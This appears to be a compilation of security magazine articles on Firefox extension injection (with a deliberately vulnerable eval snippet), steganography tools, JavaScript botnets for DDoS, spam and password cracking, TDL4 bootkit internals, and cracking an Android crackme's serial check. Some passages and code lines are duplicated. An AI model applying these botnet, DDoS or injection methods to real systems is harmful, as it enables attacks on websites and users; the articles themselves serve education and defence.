These were some of the sample malicious scripts that were scripted using basic and legal functions approved by Mozilla to produce some very malicious extensions. The malicious extensions are limited only to the imagination of a malicious creator.
Cross Context Switching (XCS) The attack (xcs) was first found by “pdp”. This was found against an extension called sage. XCS involves a concept of making malicious code moving from one realm to the other, like a code in the website being executed by the resident extension. A major harm caused by such an attack would be that a user could be compromised by just visiting the web location.
Attacking DOM & Event Handlers Event handlers implement the properties attributes and behavior of an element. When a DOM element is dragged and drooped it takes with it the attributes properties and behavior with it. This could be a maliciously used if an extension code trusted the code that was dropped by a malicious DOM element.
CreateEvent() could be used to send custom events which could also include the extensions itself. In this example we will create an extension which listens for customs events and does certain activity like loading a dynamic XUL.
This could be exploited by a malicious user by making the user go to a page controlled by him which has code create a custom event to send the location of the malicious XUL hosted by him.
The extension on receiving the event loads the Malicious XUL from an arbiter location and as the XUL file now runs as part of Chrome it is free to do any malicious activity like the ones discussed in the previous section “Malicious Extensions”
As of Firefox version 3.5 “loadoverlay ” function does not take “http” based Xul requests but does allow XUL from “Chrome:\\”. Though this fixes the problem of a malicious user loading malicious content from internet but the threat of loading malicious XUL from a Map Drive still exists.
Code:-
Extension XUL Code
Malicious Web Location Code
This Test Page
Bypassing Wrappers Multiple wrappers exist within Mozilla framework that acts as firewalls segregating the code from different zones. A developer, for ease of use could bypass these firewalls thus compromising the Firefox eco-system to malicious XCS attacks.
We will create a Firefox extension that bypasses such a wrapper using the “wrappedJSObject” to access variables in the document Zone and use this content in the privileged chrome zone. The extension developer uses another potentially vulnerable function “eval()”. He grabs the content from document and runs it through eval() in the chrome zone which allow a malicious user to inject malicious JavaScript code that will be executed by the eval function. Code:-
Extension Code
function Test_Function() { test = my_message if (test==null) { alert("Wrapper Exists") } else{ alert(test); trim = window.content.wrappedJSObject.my_message1 eval(trim); } }
Malicious Website Code
This Test Page
Protection for end Users Some points that end users can keep mind for keeping their Firefox environment safe are:-
Suspicious single file(s) in the extension folder.XPI are archives - can be un-Zipped and checked for any packaged executablesCheck the install.rdf for common pitfalls mainly Verify chrome.manifest does not point to other extension folders as it can overwrite functionality.
Measures that Developers can take:-
That’s a whole paper by itselfDon’t bypass wrappersDon’t trust content from the un-trusted context.Don’t use eval()
Follow this link: https://developer.mozilla.org/en/Security_best_practices_in_extensions
Last Words In this paper we discussed some components that make the Firefox extensions. This by far is not the end with new features like the skins extensions that don’t need a re-start bring newer problems. I believe Firefox is a powerful system that could be used both good and bad. It helps for users to be a bit cautious when using new extensions and developers when developing new extension should take care to avoid known pitfalls.
This paper is largely based on research performed by Roberto Suggi Liverani and Nick Freeman of Security- Assessment.com in 2009/2010.Further details regarding their research into Firefox extensions and their vulnerabilities can be found at the following locations:
Prasanna Kanagasabai Prasanna Kanagasabai is an independent Information Security researcher who enjoys the nuances of information security. He is an active member of “DeadPixel” Security group which is a association like minded professionals who enjoy Information security and would like to share knowledge in the group to the benefit of one and all.
Steganography is the art of hiding information in images. In Greek, Steganography means “covered writing”. In steganography, confidential data is hidden in images to protect it from unauthorized users. So basically it means, hiding a secret message within a cover-medium in such a way that others cannot detect the presence of the hidden message. In contemporary terms, steganography has evolved into a digital strategy of hiding a file in some form of multimedia, such as an image, an audio file (like a .wav or mp3) or even a video file.
Steganography vs. Cryptography Steganography and cryptography are two important techniques to secure data. It has gained importance post World War II. It is now widely used by Law Enforcement Agencies, terrorists etc.
Steganography’s goal is to hide the presence of a message.
Cryptogtaphy’s goal is to obscure a message or communication so that it cannot be understood.
Steganography differs from cryptography in the sense that, cryptography focuses on keeping the contents of a message secret, whereas steganography focuses on keeping the existence of the message secret. The strength of steganography can thus be amplified by combining it with cryptography. Steganography and cryptography make a powerful combination regarding data security!
Methods of Steganography
Embedding messages in media, like
Plain Text Steganography with plain text can be done in number of ways, as mentioned below:
Using selected characters or words from a specially-crafted cover-text. (Consider this sentence – “Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective”. Here, if you observe, first letter of each word is used to convey a message - Secret Inside!!)Introducing white-space characters (line spaces and tabs) that a text view won’t display.
For demonstration purpose we will illustrate SNOW (Steganographic nature of Whitespace).
SNOW
Snow is a program for concealing and extracting messages in ASCII text files. This method conceals messages by appending tabs and spaces (known as whitespace) at the end of lines. Tabs and spaces are invisible to most text viewers, hence depicting steganographic nature of this encoding scheme.
Figure. 1.1 shows all the available options in snow. They are described as below:
-C = use compression during concealing, uncompress during extraction -Q = quite mode. Used to turn off verbose messages while program runs -S = Show approximate space available in cover file -p = password option is used for encryption/decryption - l = snow will create lines sorter than this optional line length parameter -f = this is the secret file -m = this is the secret message string infile = this is the input cover file outfile = this is the output file
For this example, we will use following file :-
insnow.txt = this is the secret file to conceal hide.txt = this is the infile (cover file) outsnow.txt = this is the outfile (cover file + secret file) p@ssword = this is the password used for encryption/decryption Note:- All the above specified examples need appropriate substitution for practical purposes..
Now to hide the file – insnow.txt within hide.txt using encryption with the output of snow, the command is as follows:
Now to extract the hidden message following command is used:
And the contents of the secret file are revealed:-
“meet me at dawn”
Image Steganography
Data can be hidden in images also. In fact images are most widely used in steganography.
Tools:
Many tools are available to do image steganography like Camouflage, JPEG-JSTEG. For demonstration we will use Camouflage.
Camouflage:
Camouflage allows you to hide files by scrambling them and then attaching them to the file of your choice. This camouflaged file then looks and behaves like a normal file, and can be stored or emailed without attracting attention. Camouflage software is easy to install, user-friendlyand a very versatile steganography tool that is free of cost and readily available for downloading .
For example following files will be used:-
Sunflower.jpg = cover medium Secret.jpg = file to be hidden Kiss = passphrase
Camouflaging Files:
You can camouflage a file or several files at a time by right-clicking them and choosing “Camouflage” from the menu. Following window will appear.
Now, in the first window, you can view/edit the files by double clickin them or by right clicking them and choosing ‘Open’. Selectin “Properties’ will give information about the file.
Anyway, click next.
Here, in the second window, it will ask for the cover medium (file). Select a file with which you want to cover your secret file. This file can be of any type, but in this example we are using a .JPG file.;
In the next window, give the location and filename for the camouflaged file. Check ‘Read-only’ to create camouflaged file with its ‘Read-only’ attribute. This is recommended because it makes the file safer, and prevents other applications from modifying it and destroying the camouflaged section.
In the final window you can type a password.We will use “kiss” as password for demonstration purpose. If you do not wish to add password then just click ‘Finish’. This will create the camouflaged file and then exit.
Uncamouflaging Files:
To extract the files hidden within a comuflaged file, right-click the camouflaged file and choose ‘Uncamouflage’ from the menu.
A password prompt appears. Enter the password, if any. Once you entered the correct password (if applicable), click ‘Next’
This window displays a list of the files hidden within the camouflaged file. The first file in the list is the file originally used as camouflage (cover medium).To extract files just click ‘Next’.
Here give the location where you want the file to be extracted. Now you can view your secret file!!!
Audio Steganography
In Audio steganography,secret messages are embedded in digital sound. The secret message is embedded by slightly altering the binary sequence of a sound file. Existing audio steganography software can embed messages in WAV, AU, and even MP3 sound files.
Embedding secret messages in digital sound is usually a more difficult process than embedding messages in other media, such as digital images.
S-Tools:
For example following files will be used:-
Cover.wav = this is the cover medium file Secret.wav = this is the hidden data file Out.wav = output file (cover_medium + hidden_file) p@ssw0rd = this is the passphrase
Open S-Tools (S-Tools.exe). Drag the cover_medium, in this case cover.wav, into the S-Tools window
Now, to hide the secret file, drag secret.wav into S-tools window and drop it onto the cover medium. Immediately you will be prompted for a passphrase. The passphrase is used in generating the pseudo-random number which is used to insert the bits into the cover file. IDEA, DES, TripleDES, and MDC are the encryption algorithms provided by S-Tools.
After choosing appropriate passphrase and Encryption Algorithm, right click on the secret file and save it.
The passphrase and encryption algorithm used must be remembered in order to extract the secret file.
Now, to extract the hidden message, open the out.wav in S-Tools.
Steganography, the easy way… No steganography software required!!! Yes you read it right - No steganography software.
So here is a quick how-to on doing image steganography with common tools, without any specialized software.
Compress the file you want to secure( I tried both rar & zip), say secure.zipTake the image file which you want to use, say image.jpgrun the following commandcopy /b image.jpg + secure.zip hidden.jpgDouble click hidden.jpg & you'll see the original imageOpen the file in archiving utility ( tried winzip & winrar)It will open the content of original secure.zip
Abhijeet R Patil
abhijeet@chmag.in
Analysis
copy command copies the content of both the files into a third file.
The third file starts with the header of an image & even the extension is of image, so the OS (tried KDE & GNOME in case of Linux) interprets it like an image & shows the image, that too without any distortion or noise in the image.
/b option indicates binary operation & takes care of any possible goof up.
PoC
Download the image from http://bit.ly/stegano-demo which looks like one below & try opening it in any archiving software.
JavaScript Botnets | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home JavaScript Botnets
Anybody who has had even a slight brush with the security industry would have heard of Botnets atleast once. Botnets are a group of computers compromised and controlled by an attacker, these computers or zombies would perform any actions that the attacker commands them to do. Botnets are usually created by compromising the victims' systems with some remote code execution exploits and then installing backdoors on them. The attackers must have been working on exploits for 0-days or newly discovered vulnerabilities to be able to infect more victims. Even then they are usually restricted to only one platform unless they have exploits and backdoors for the different platforms out there. There is another type of remote code execution that is far more easier to perform - JavaScript in web pages. Executing JavaScript in someone's system does not require any 0-days or exploits but simply requires the person to visit a website. Moreover the same piece of JavaScript would work across all OSs’ and platform(desktops, tablets, mobiles etc). Every time a user clicks on a link he is giving a remote website an opportunity to execute code (JavaScript) on his machine. The window of this opportunity is widened by the concept of tabbed browsing. Most users have multiple open tabs and most tabs remain open throughout the browsing session which could stretch for hours. This enables an external entity to utilize the user’s processing power and bandwidth for his malicious needs. Spammers, especially on sites like Twitter, have been able to get thousands of users to click on their links in very short durations. But JavaScript is believed to be handicapped due to performance constraints and the restrictions enforced by the browser’s sandbox. This however is a misconception as JavaScript engines have become extremly fast over the recent years. Moreover HTML5 introduces WebWorkers which is a threading model for JavaScript. This lets any website start a background JavaScript thread unknown to the user and execute code without slowing down or making the browser unresponsive.
Creating a JavaScript Botnet: A JavaScript botnet would include thousands of systems that have the attacker controlled page open on their browsers for an extended duration allowing continued execution of the attacker’s JavaScript. There are two phases in building such a botnet: A JavaScript botnet would include thousands of systems that have the attacker controlled page open on their browsers for an extended duration allowing continued execution of the attacker’s JavaScript. There are two phases in building such a botnet: 1) Reaching out to victims 2) Extending execution lifetime
1) Reaching out to victims : This involves getting the victim to visit an attacker controlled website. This can be done in a number of different ways: 1) Email spam 2) Trending topics on Twitter 3) Persistent XSS on popular websites, forums etc 4) Search Engine Poisoning 5) Compromised websites 6) Abusing URL Shortners
These are methods used by current JavaScript malware authors to attack victims to their website and can draw thousands of victms. While traditional malware spreading website can be quickly identified due to automated crawlers looking for signatures of browser exploits, JavaScript botnet payloads are less likely to be identified since its regular JavaScript working within the constraints of the sandbox and does not perform any exploitation against the browsers.
2) Extending execution lifetime: Once a victim visits the attacker controlled page it is essential to keep this page open in the victim’s browser for as long as possible. This can be done by using a combination of Clickjacking and Tabnabbing. When the page is loaded, it would contain an invisible link with the target attribute set to ‘_blank’. This link is always placed under the mouse pointer using the ‘document.onmousemove’ event handler. This way, when the victim clicks anywhere on the page a new tab opens and grabs the victim’s attention. With multiple tabs open the likelihood of the victim coming back to the main tab and closing it is reduced. To add to this effect Tabnabbing can be used to refresh the page after the user leaves it, to update the favicon and appearance to seem similar to popular websites like YouTube, Google or Facebook so that the page blends in with the other tabs the victim would usually have open. There is a working demo[http://www.andlabs.org/hacks/xtend_life.html] for this available on the Attack and Defense Labs website.
JavaScript botnet activities: JavaScript botnets can be used to perform the same activities that are performed by traditional botnets. This article will discuss three such activities: 1) Application-level DDoS attacks 2) Email Spam 3) Distributed password cracking
1) Application-level DDoS attacks DDoS attacks have been all over news in recent time as activists belonging to either side of the Wikileaks debate took out each others websites. Firms like Mastercard and Visa have suffered significant losses due to this. Application-level DDoS attack is an effective type of DDoS attack that has affected even sites like Twitter. Usually these attacks involve large number for HTTP requests to specific sections of the website that could potentially be resource intensive for the server to process. Background JavaScript threads that were started using WebWorkers can send cross domain XMLHttpRequests even though the remote website does not support it. The Cross Origin Request security restriction is only on reading the response. A website that does not support Cross Origin requests will also process these request thereby creating load on the server. A simple request like http://www.target.site/search_product.php?product_id=% when sent in large numbers can create serve performance issues on the server. A browser can send surprisingly large of GET requests to a remote website using COR from WebWorkers. During tests it was found that around 10,000 requests/minute can be sent from a single browser. With even a very small botnet of just 600 zombies we would be sending around 100,000 requests/sec, depending on the nature of the page being requested this could be enough to bring a website down. After I wrote about DDoS attacks with COR a very smart person[http://shellex.info] showed me that similar numbers could also be achieved by using the img tag to request remote resources. Ben Schmidt has gone one step further by creating a malcious URL shortening service called d0z.me. d0z.me seems to work like any other URL shortening service but it actually shows the destination page in an iframe while perform DoS attacks on a target website from the victim's browser. It executes this so well that it is extremly unlikely that the user will even sense that he is part of a DDoS attack.
2) Email Spam Spam mails are largely sent using open-relay mail servers and botnet zombies. Though it would not be possible to a regular open-relay mail server from JavaScript still it would be possible to send such spam mails through the web equivalent of open-relay mails servers. Many websites have feedback sections which ask the user to enter their name, email ID, subject and feedback. Once these are entered and the form is submitted, the server would craft this in the form of an email, with hard-coded from and to mail addresses and send it to the internal mail server. Poorly designed websites would contain the from and to mail addresses in hidden form fields on the browser and by overwriting them to external addresses it should be possible to send mails with spoofed addresses if the company’s mail server is also configured to operate in an open-relay mode. Since only GET requests can be sent through COR, the feedback form should either be sending all data in QueryString or it should be differentiating between QueryString and POST parameters. Alternatively if it is JSP page then HTTP Parameter Pollution can be used to submit forms over GET.
3) Distributed password cracking Password cracking has always been a task assigned for programs written in native code with performance enhancement by writing some sections in Assembly. With its relatively slower execution rate JavaScript has never been considered for performing such resource-intensive tasks. Things however have changed, JavaScript engines in modern browser are becoming increasingly fast and the concept of WebWorkers allows creation of dedicated background threads for the purpose of password cracking. During our tests it has been possible to observe password guessing rates of 100,000 MD5 hashes/second in JavaScript. This figure is still slow compared to native code which can easily loop through a few million MD5 hashes/second on a machine with similar configuration. The JavaScript approach has been found to be on an average about 100-115 times slower than that of native code but more than that it makes up in scalability. ~110 machines running the JavaScript password cracking program can match the cracking rate of one machine running a similar program written in native code. As shown in the previous sections it would be very easy to build a botnet of a few thousand zombies executing our JavaScript password cracker in the background. Even with 1100 zombies our cracking rate would be equivalent to that of having 10 machines of similar configurations running a password cracked written in native code. An effective botnet creation effort could potentially get hundreds of thousands of such zombies to crack password hashes providing unimaginable computing capability. I have built Ravan[http://www.andlabs.org/tools/ravan.html], a JavaScript distributed hash cracking system which is an implementation of this concept designed to be used for legitimate needs.
Lavakumar Kuppan lava@andlabs.org
Lava is a Penetration tester and Security Researcher.
EntertainmentJavaScriptmodel for JavaScripttechGyanTechnologyTwitter Add new comment Author CHMag Collector's Edition Vol II
Rootkits are Back with the Boot Infection | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home Rootkits are Back with the Boot Infection
Preface
Windows rootikits have been around since year 2005 and have become a buzzword in the security industry over recent years. While rootkits have traditionally been used by sophisticated attackers to hide their presence on compromised machines, recent malwares with rootkit capabilities have started using them to complicate efforts to detect and clean the infections. This article aims to give an idea about Windows rootkits with advanced techniques observed in the recent years, mainly rootkits with boot infections. Windows RootkitsThis is not year 2005, when the word “Rootkit” was not known to the most of the people in cyber world besides security researchers. The technique used by rootkits to hide the presence of malwares has been, for longer time, to steal more information, send out more spam, launch more DDOS attacks, and ultimately make millions of dollars, was the matter of concern for only the cyber security researchers. But some commercial ethical software had adopted the same technique for self protection. Among all of them Sony Digital Rights Management (DRM) software received intense media attention and criticism in late 2005 and the word “Rootkit” became common term in the cyber security world. You will find more than dozen of definitions of the “Rootkit”. But to understand the term in very simple manner we have following definition of rootkit: A Rootkit is a set of tools used by an intruder after cracking a computer system. These tools can help the attacker maintain his or her access to the system and use it for malicious purposes. Root kits exist for a variety of operating systems. The term rootkit is used to describe the mechanisms and techniques whereby malware, including viruses, spyware, and trojans, attempt to hide their presence from antispyware, antivirus, and various system management utilities. In other words, a rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence of other components, mostly the malwares. Windows rootkits are the rootkits which work on Microsoft Windows Operating system’s versions to hide the presence of malwares’ components like files, registry, processes, drivers etc. They do achieve this by using techniques like user mode hooking, SSDT hooking, IRP hooking and Direct kernel Object Manipulation (DKOM) etc.Initially PoC (proof of concept) Windows rootkits were constantly being released to demonstrate new methods of bypassing rootkit detection and prevention mechanisms provided by various security vendors for Windows operating system. Some proof of concept also got published in one of the bestselling books about Windows rootkits; “Subverting The Windows Kernel: ROOTKITS”. But eventually most of the PoCs got transformed into real world rootkits that made their way into the hands of attackers. The current state of rootkits is no more than just an arms race but has become warfare between the rootkit writers and the anti-rootkit industry which is responsible for protecting millions of systems. Advanced Windows Rootkits with boot infection: TDSSWe can divide Windows rootkits' era in two parts, one as pre TDSS (also known as TDL, Alureon Family) and other is TDSS family. The TDSS family rootkit first appeared in 2008. Since then, it has become far more widespread than one of the most notorious rootkits like Rustock. It has been more than two years since this family of rootkits began to evolve. The rootkit writers of this family have developed one of the most sophisticated and advanced mechanisms for bypassing various protective measures and security mechanisms embedded into the operating system. TDSS implements the concept of infecting operating system drivers and MBR; this means it is loaded and run at the very early stages of the operating system. This effectively complicates the detection of TDSS and makes the task of cleaning it too difficult and challenging. TDL4 is the most recent high tech and widely spread member of the TDSS family rootkit, targeting x64 operating systems too such as Windows Vista and Windows 7. One of the most striking features of TDL4 is that it is able to load its kernel-mode driver on systems with an enforced kernel-mode code signing policy (64-bit versions of Microsoft Windows Vista and 7) and perform kernel-mode hooks with kernel-mode patch protection policy enabled. When the driver is loaded into kernel-mode address space it overwrites the MBR (Master Boot Record) of the disk by sending SRB (SCSI Request Block) packets directly to the miniport device object, then it initializes its hidden file system. The bootkit’s modules are written into the hidden file system from the dropper. The TDL4 bootkit controls two areas of the hard drive one is the MBR and other is the hidden file system created at the time of malware deployment. When any application reads the MBR, the bootkit changes data and returns the contents of the clean MBR i.e. prior to the infection, and also it takes care of Infected MBR by protecting it from overwriting. The hidden file system with the malicious components also gets protected by the bootkit. So if any application is making an attempt to read sectors of the hard disk where the hidden file system is stored, It will return zeroed buffer instead of the original data. The bootkit contains code that performs additional checks to prevent the malware from the cleanup. At every start of the system TDL4 bootkit driver gets loaded and initialized properly by performing tasks as follows:Reads the contents of the boot sector, compares it with the infected image stored in hidden file system, if it finds any difference between these two images it rewrites the infected image to the boot sector.Sets the DriverObject field of the miniport device object to point to the bootkit’s driver object and also hooks the DriverStartIo field of the miniport’s driver object.If kernel debugging is enabled then this TDL4 does not install any of it’s components. TDL4 Rootkit hooks the ATAPI driver i.e. standard windows miniport drivers like atapi.sys. It keeps Device Object at lowest in the device stack, which makes a lot harder to dump TDL4 files. All these striking features have made TDL4 most notorious Windows rootkit and it is also very important to mention that the key to its success is the boot sector infection. Stealthy variant of Bootkit.TrupWe will go through the technical details of the one more new generation malware with bootkit ability which is simpler in design than TDL4 but again using boot infection as a key. The new variant of Bootkit. Trup was making rounds 2-3 months back, which is updated to protect the infected MBR. The encryption used in Bootkit. Trup.B is very similar to its old variant "Bootkit. Trup.A" which is simple rotate right (ROR) operation. It gets Drive geometry of the infected disk and then calculates position near end of the partition to store original MBR and other components. These components are written into unallocated part of the partition, in case disk becomes full there is chance of it getting overwritten with other data.
The original MBR and driver component are stored in encrypted form using the same encryption. Driver component hooks ATAPI's DriverStartIo routine where it monitors for write operations. In case of write operation targeted at the MBR sector, it is changed to read operation. This way it is trying to bypass repair operation by Security Products. MBR protection mechanism was previously seen in TDSS.TDL4 which was sitting at the bottom of the storage stack to monitor read and write operations to first sector and its encrypted components in unpartitioned disk space. Having insights of the technical details of these new generation Windows rootkits, the reader must have got an idea that how difficult it is for anti-rootkit tools to counter them. ConclusionIn the past few years there were no great concerns about the malware infecting boot sectors and they were even told to be no more in the wild. But looking at the changing threat landscape in the last year or two, we have to mention that these types of malwares are coming back with more rootkit capabilities.Most of the anti-rootkit softwares available resulted in the failure while detecting the presence of these rootkits, as these antirootkit tools use techniques like cross view based detection, user mode or kernel mode hook detection or DKOM detection. These rootkits don’t provide any chance to scan the “Rooms”, where their components are residing. As Current Anti-Rootkit softwares are not helping us more in tackling such highly advanced rootkits, need of specialized bootkit detection and removal tool arises. Most of Security vendors have already developed and released these kinds of specialized tools to counter these rootkits. Analysis of such complex malwares becomes harder with unavailability of dropper samples. The war against rootkits has been taken up to a newly changed battle¬ground as insights of case studies mentioned above give clear idea that how rootkit driver protects infected Master Boot Record, which keeps those advanced rootkits ahead than traditional bootkits. We have to be ready for all such techniques never seen before in malware threats and next generation of rootkits, bootkits, kernel infectors and boot sector infectors written by highly technical and professional malware writers.CreditsI would like to give sincere thanks to Mr. Sanjay Katkar (CTO, Quick Heal Technologies) for his most valuable guidance. Also I would like to thank to my colleague Mr. Rajesh Nikam and Mr. Rajendra Kumbhar for their help in the analysis and valuable inputs. Swanand Shinde
Swanand Dattaram Shinde is working with Quick Heal Technologies (P) Ltd. since 2005 as a Sr.Software Engineer. He holds Masters in Computer Science. He is currently working in Research and Development of Antivirus Quick Heal. He has researched on various security products like Antivirus, AntiRootkit etc.
Driverhigh techMicrosoft WindowsPerson CareerPerson EducationRajendra KumbhartechGyanTechnologyWindows 7Windows Vista Add new comment CHMag Collector's Edition Vol II
Introduction Recently, the open source mobile operating system 'Android' has a large community of developers writing application programs that extend the functionality of supporting devices. It seems a lot of people are getting crazy about the Android platform these days (everyone is trying to buy an Android phone!). I don‘t have an Android cell phone but still, I did manage to learn a few tricks on this Linux + java clean room engineered platform. In this article I shall explain you with an example, the simple technique of reverse engineering a normal android application.
Setting up the Ground For the purpose of a demonstration, I have chosen an Android crackme application published by Deurus and explained the steps involved to legally reverse engineer this application. And our objective (Don’t get the wrong idea friends!) is to break the licensing scheme of this application. So to begin our journey we first need to get geared up. First we need the Android SDK and then the necessary tools.
You can download the necessary files from these locations: Android SDK: http://developer.Android.com/sdk/index.html Smali and baksmali: http://code.google.com/p/smali/ Dex2jar: http://code.google.com/p/dex2jar/ Java decompiler: http://java.decompiler.free.fr/ Deurus Android crackme 03: http://crackmes.de/users/deurus/android_crackme03/
Getting Started with the Game Download all these files to your hard disk. Unzip Android SDK to C:\. Unzip rest of the tools to C:\ android-sdk-windows\RE. If everything is in order you can start Android SDK manager from C:\android-sdk-windows\. Now it will give you a list of packages to download and install. We need to select at least one SDK platform to continue our quest. After downloading and installing, we can move on to creating a new Android Virtual Device.
After creating AVD, we can start emulation by selecting AVD and clicking the start button. Within a few minutes we can see the emulator booting up and showing the phone screen. That’s it! We have our emulator up and running. Now we need to install the software (crackme, its legal!) to the emulator. For that you may have to get acquainted with Android debug bridge (adb). Installing an apk file is pretty simple; all you have to do is to run two commands from the Android SDK directory/tools.
After the installation you can see the crackme icon from application menu.
Now run the crackme by clicking on it. If everything went as expected you will see the crackme application on the screen.
Now let’s try to play with it a bit, pressing the check button with no inputs pops a message 'Min 4 chars', and if the check button is pressed with a proper name it pops up a message 'Bad boy'. Do remember these strings because we will be using them as our search keys when we deassemble the apk (actually the dex) files. Also note that we have two hardware ids and we need to find out what those exactly mean.
Now for real Reverse Engineering As our crackme is up and running in the emulator, we can now move on to the reversing part. If you have read the apk file format, you can somewhat visualize it as an extended JAR file which essentially is a zip file. Now you can change the crackme file name from ‘Crackme03.apk’ to ‘Crackme03.zip’ and decompress it to any folder.
Now the interesting file for us is the ‘classes.dex’, which contains the compiled virtual machine (vm) codes. We are now going to deassemble the dex file with baksmali. The commands are pretty simple as mentioned in the screen shots below.
If everything worked fine, we will have a folder structure similar to Java packages. Interesting .smali files are located at '\com\example\helloandroid'. Open all the .smali files into your favorite text editor(I use Notepad++).
If you have never done anything related to reverse engineering/esoteric programming/assembly(IL) programming, don’t start sweating. We have just opened a disassembled dex file. Next, if you are thinking that how on earth can someone find the correct location of a checking function, Well I hope you remember those pop up strings I told earlier. Yeah, 'Min 4 chars' and 'Bad boy'. It is time to use those strings as our search keys. After searching the’ Min 4 chars’ in all the opened .smali files, we will find a hit in the file HelloAndroid$2.smali, quite specifically line 130.If everything worked fine, we will have a folder structure similar to Java packages. Interesting .smali files are located at '\com\example\helloandroid'. Open all the .smali files into your favorite text editor(I use Notepad++).
If you have never done anything related to reverse engineering/esoteric programming/assembly(IL) programming, don’t start sweating. We have just opened a disassembled dex file. Next, if you are thinking that how on earth can someone find the correct location of a checking function, Well I hope you remember those pop up strings I told earlier. Yeah, 'Min 4 chars' and 'Bad boy'. It is time to use those strings as our search keys. After searching the’ Min 4 chars’ in all the opened .smali files, we will find a hit in the file HelloAndroid$2.smali, quite specifically line 130.
Our aim is now to understand the serial checking function and write a keygen for it. For which we have to know all the dalvik opcodes that are used here. You can visit this page (http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html) to understand the opcodes and after that you can convert the disassembled code to much higher language constructs. Here, I will provide a brief code snippet which actually implements the algorithm. The two hardware ids used are the IMEI and the sim serial number.
01 //Read name from text box 02 const v23, 0x7f050004 03 invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View; 04 move-result-object v9 05 06 //Read serial from text box 07 const v23, 0x7f050006 08 invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View; 09 move-result-object v21 10 11 //Checking whether the name is of length greater than 4 12 const/16 v22, 0x4 13 move v0, v11 14 move/from16 v1, v22 15 if-ge v0, v1, :cond_51 16 17 //Popup showing Min 4 chars 18 const-string v23, "Min 4 chars" 19 const/16 v24, 0x1 20 .line 8601 //Read name from text box 02 const v23, 0x7f050004 03 invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View; 04 move-result-object v9 05 06 //Read serial from text box 07 const v23, 0x7f050006 08 invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View; 09 move-result-object v21 10 11 //Checking whether the name is of length greater than 4 12 const/16 v22, 0x4 13 move v0, v11 14 move/from16 v1, v22 15 if-ge v0, v1, :cond_51 16 17 //Popup showing Min 4 chars 18 const-string v23, "Min 4 chars" 19 const/16 v24, 0x1 20 .line 86
21 invoke-static/range {v22 .. v24}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast; 22 move-result-object v13 23 .line 88 24 .local v13, notificacionToast:Landroid/widget/Toast; 25 invoke-virtual {v13}, Landroid/widget/Toast;->show()V 26 27 //There is a little exception trick to make integer string from username 28 //It converts aaaa to 97979797 which is ascii equivalent 29 invoke-virtual {v10, v5}, Ljava/lang/String;->charAt(I)C 30 move-result v3 31 32 //Getting first 5 chars from ascii converted name 33 const/16 v22, 0x0 34 const/16 v23, 0x5 35 move-object v0, v12 36 move/from16 v1, v22 37 move/from16 v2, v23 38 invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String; 39 40 //Converting it into integer and xoring with 0x6B016 - Serial part 1 41 invoke-static {v12}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 42 move-result v22 43 const v23, 0x6b016 44 xor-int v22, v22, v23 45 46 //Getting IMEI from TelephonyManager 47 //http://developer.Android.com/reference/Android/telephony/TelephonyManager.html 48 invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String; 49 move-result-object v6 50 .line 102 51 .local v6, imei2:Ljava/lang/String; 52 53 //Getting sim serial 54 invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getSimSerialNumber()Ljava/lang/String; 55 move-result-object v16 56 .line 103 57 .local v16, simsn:Ljava/lang/String; 58 59 //Getting first 6 chars from IMEI, and similarly from sim serial (IMEI.Substring(0,6) will be used as Serial part 3) 60 const/16 v22, 0x0 61 const/16 v23, 0x6 62 move-object v0, v6 63 move/from16 v1, v22 64 move/from16 v2, v23 65 invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String; 66 67 //Converting them to integer and xoring - Serial part2 68 invoke-static/range {v19 .. v19}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 69 move-result v22 70 invoke-static/range {v20 .. v20}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 71 move-result v23 72 xor-int v22, v22, v23 73 74 //Making a new StringBuilder object and formatting the string to part1-part2-part3 75 new-instance v22, Ljava/lang/StringBuilder; 76 invoke-static {v12}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String; 77 move-result-object v23 78 invoke-direct/range {v22 .. v23}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V 79 const-string v23, "-" 80 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 81 move-result-object v22 82 invoke-static/range {v17 .. v18}, Ljava/lang/String;->valueOf(J)Ljava/lang/String; 83 move-result-object v23 84 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 85 move-result-object v22 86 const-string v23, "-" 87 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 88 move-result-object v22 89 move-object/from16 v0, v22 90 move-object/from16 v1, v19 91 invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 92 move-result-object v22 93 94 //Checking whether user entered serial and program made serials are equal. 95 invoke-virtual {v14, v15}, Ljava/lang/String;->equals(Ljava/lang/Object;)
